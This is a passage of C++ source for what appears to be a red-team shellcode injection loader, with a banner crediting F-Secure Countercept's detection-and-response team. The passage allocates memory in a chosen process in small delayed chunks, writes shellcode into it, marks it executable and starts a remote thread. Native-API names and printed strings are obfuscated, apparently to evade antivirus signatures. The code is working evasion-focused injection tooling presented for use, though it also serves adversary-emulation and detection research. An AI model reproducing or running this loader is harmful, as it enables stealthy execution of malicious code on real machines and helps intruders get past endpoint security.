137 |     {
138 |         for (cmm_i = 0; cmm_i < cVmCmm; ++cmm_i) 
139 |         {
140 |             prcDone += 1.0 / cVmResv / cVmCmm;
141 | 
142 |             DWORD offset = (cmm_i * szVmCmm);
143 |             currentVmBase = (LPVOID)((DWORD_PTR)vcVmResv[i] + offset);
144 | 
145 |             status = ANtAVM(
146 |                 hProc, 
147 |                 &currentVmBase, 
148 |                 NULL, 
149 |                 &szVmCmm, 
150 |                 MEM_COMMIT, 
151 |                 PAGE_READWRITE
152 |             );
153 | 
154 |             DelayShowProgress(prcDone, 2, msStepDelay / 2, tpid, msTimeReq, (int)vmBaseAddress);
155 | 
156 |             SIZE_T szWritten{ 0 };
157 | 
158 |             status = ANtWVM(
159 |                 hProc, 
160 |                 currentVmBase, 
161 |                 &shellcode[offsetSc], 
162 |                 szVmCmm, 
163 |                 &szWritten
164 |             );
165 | 
166 |             DelayShowProgress(prcDone, 2, msStepDelay / 2, tpid, msTimeReq, (int)vmBaseAddress);
167 | 
168 |             offsetSc += szVmCmm;
169 | 
170 |             status = ANtPVM(
171 |                 hProc, 
172 |                 &currentVmBase, 
173 |                 &szVmCmm, 
174 |                 PAGE_EXECUTE_READ, 
175 |                 &oldProt
176 |             );
177 |         } 
178 |     }
179 |    
180 |     for (di = 0; di < 0.99; di += 0.11) {
181 |         DelayShowProgress(di, 3, msStepDelay * 2, tpid, msTimeReq, (int)vmBaseAddress);
182 |     }
183 | 
184 |     LPVOID entry = PrepEntry(hProc, vmBaseAddress);
185 | 
186 |     for (di = 0; di < 0.99; di += 0.11) {
187 |         DelayShowProgress(di, 4, msStepDelay * 2, tpid, msTimeReq, (int)vmBaseAddress);
188 |     }
189 | 
190 |     HANDLE hThread{ nullptr };
191 | 
192 |     ANtCTE(
193 |         &hThread,
194 |         THREAD_ALL_ACCESS,
195 |         NULL,
196 |         hProc,
197 |         (LPTHREAD_START_ROUTINE)entry,
198 |         NULL,
199 |         NULL,
200 |         0,
201 |         0,
202 |         0,
203 |         nullptr
204 |     );
205 | 
206 |     DelayShowProgress(1.0, 5, msStepDelay * 10, tpid, msTimeReq, (int)vmBaseAddress);
207 |     return ERROR_SUCCESS;
208 | }
209 | 
210 | 
211 | int main(int argc, char *argv[])
212 | {
213 |     EnableAnsiSupport();
214 | 
215 |     if (8 != sizeof(void*)) {
216 |         // Error: non-64 bit system
217 |         cout << '\n' << '' << '[' << '3' << '1' << 'm' << 'E' << 'r'
218 |              << 'r' << 'o' << 'r' << ':' << ' ' << 'n' << 'o' << 'n'
219 |              << '-' << '6' << '4' << ' ' << 'b' << 'i' << 't' << ' '
220 |              << 's' << 'y' << 's' << 't' << 'e' << 'm' << '' << '[' 
221 |              << '0' << 'm' << '\n';
222 |         return -1;
223 |     }
224 | 
225 |     int tpid{ 0 };
226 |     int msStepDelay{ 0 };
227 |     
228 |     char header[]{ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x2f, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x25, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x28, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x5f, 0x5f, 0x5f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x5f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x5f, 0x5f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x5f, 0x5f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2f, 0x20, 0x5f, 0x20, 0x5c, 0x5f, 0x5f, 0x5f, 0x5f, 0x28, 0x5f, 0x29, 0x5f, 0x5f, 0x20, 0x20, 0x2f, 0x20, 0x2f, 0x20, 0x20, 0x5f, 0x5f, 0x5f, 0x20, 0x20, 0x5f, 0x5f, 0x5f, 0x20, 0x5f, 0x5f, 0x5f, 0x5f, 0x2f, 0x20, 0x2f, 0x5f, 0x5f, 0x20, 0x5f, 0x5f, 0x5f, 0x5f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x2f, 0x20, 0x2f, 0x2f, 0x20, 0x2f, 0x20, 0x5f, 0x5f, 0x2f, 0x20, 0x2f, 0x20, 0x5f, 0x20, 0x5c, 0x2f, 0x20, 0x2f, 0x5f, 0x5f, 0x2f, 0x20, 0x5f, 0x20, 0x5c, 0x2f, 0x20, 0x5f, 0x20, 0x60, 0x2f, 0x20, 0x5f, 0x20, 0x20, 0x2f, 0x20, 0x2d, 0x5f, 0x29, 0x20, 0x5f, 0x5f, 0x2f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x2f, 0x5f, 0x5f, 0x5f, 0x5f, 0x2f, 0x5f, 0x2f, 0x20, 0x2f, 0x5f, 0x2f, 0x20, 0x2e, 0x5f, 0x5f, 0x2f, 0x5f, 0x5f, 0x5f, 0x5f, 0x2f, 0x5c, 0x5f, 0x5f, 0x5f, 0x2f, 0x5c, 0x5f, 0x2c, 0x5f, 0x2f, 0x5c, 0x5f, 0x2c, 0x5f, 0x2f, 0x5c, 0x5f, 0x5f, 0x2f, 0x5f, 0x2f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2f, 0x5f, 0x2f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x62, 0x79, 0x20, 0x46, 0x69, 0x6c, 0x69, 0x70, 0x20, 0x4f, 0x6c, 0x73, 0x7a, 0x61, 0x6b, 0x20, 0x20, 0x28, 0x40, 0x5f, 0x6c, 0x70, 0x76, 0x6f, 0x69, 0x64, 0x29, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x46, 0x2d, 0x53, 0x65, 0x63, 0x75, 0x72, 0x65, 0x20, 0x43, 0x6f, 0x75, 0x6e, 0x74, 0x65, 0x72, 0x63, 0x65, 0x70, 0x74, 0x20, 0x44, 0x52, 0x54, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x4d, 0x5a, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x41, 0x52, 0x55, 0x48, 0x2e, 0x2e, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x48, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x5a, 0x48, 0x2e, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x4c, 0x2e, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70, 0x72, 0x6f, 0x67, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x72, 0x61, 0x6d, 0x20, 0x63, 0x61, 0x6e, 0x6e, 0x6f, 0x74, 0x20, 0x62, 0x65, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x72, 0x75, 0x6e, 0x20, 0x69, 0x6e, 0x20, 0x44, 0x4f, 0x53, 0x20, 0x6d, 0x6f, 0x64, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x65, 0x2e, 0x2e, 0x2e, 0x2e, 0x24, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x2e, 0x6b, 0x6e, 0x52, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x00 };
229 | 
230 |     if (argc == 1) {
231 |         PlayHeader();
232 |         system("cls");
233 |         printf(header);
234 |         do {
235 |             cout << "\n";
236 |             // Target PID:
237 |             cout << 'T' << 'a' << 'r' << 'g' << 'e' << 't' << ' '
238 |                  << 'P' << 'I' << 'D' << ':' << ' ';
239 |             cin >> tpid;
240 |             cin.clear();
241 |             cin.ignore(256, '\n');
242 |         } while (cin.fail() || tpid == 0);
243 | 
244 |         cout << "\n";
245 | 
246 |         do {
247 |             // How much time are you willing to waste? (ms per step):
248 |             cout << 'H' << 'o' << 'w' << ' ' << 'm' << 'u' << 'c' << 'h' << ' '
249 |                  << 't' << 'i' << 'm' << 'e' << ' ' << 'a' << 'r' << 'e' << ' '
250 |                  << 'y' << 'o' << 'u' << ' ' << 'w' << 'i' << 'l' << 'l' << 'i'
251 |                  << 'n' << 'g' << ' ' << 't' << 'o' << ' ' << 'w' << 'a' << 's'
252 |                  << 't' << 'e' << '?' << ' ' << '(' << 'm' << 's' << ' ' << 'p'
253 |                  << 'e' << 'r' << ' ' << 's' << 't' << 'e' << 'p' << ')' << ':' 
254 |                  << ' ';
255 |             cin >> msStepDelay;
256 |             cin.clear();
257 |             cin.ignore(256, '\n');
258 | 
259 |             if (msStepDelay > 0 && msStepDelay < 100) {
260 |                 // Minimal delay is 100 ms
261 |                 cout << '\n' << '' << '[' << '3' << '1' << 'm' << 'M' << 'i'
262 |                      << 'n' << 'i' << 'm' << 'a' << 'l' << ' ' << 'd' << 'e'
263 |                      << 'l' << 'a' << 'y' << ' ' << 'i' << 's' << ' ' << '1'
264 |                      << '0' << '0' << ' ' << 'm' << 's' << '' << '[' << '0'
265 |                      << 'm' << '\n';
266 |             }
267 | 
268 |         } while (cin.fail() || msStepDelay < 100);
269 |     }
270 |     else if (argc == 3) {
271 |         tpid = (int)strtol(argv[1], NULL, 10);
272 |         msStepDelay = (int)strtol(argv[2], NULL, 10);   
273 |     }
274 |     else {
275 |         printf(header);
276 |         // Usage information
